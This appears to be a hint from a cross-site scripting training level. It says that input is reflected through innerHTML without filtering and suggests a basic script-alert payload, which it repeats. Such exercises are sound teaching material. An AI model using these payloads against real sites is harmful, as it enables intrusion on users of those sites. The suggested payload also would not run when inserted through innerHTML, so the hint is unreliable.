This level reflects input directly using innerHTML with no filters. Try a simple payload like <script>alert('XSS')</script>
innerHTML
<script>alert('XSS')</script>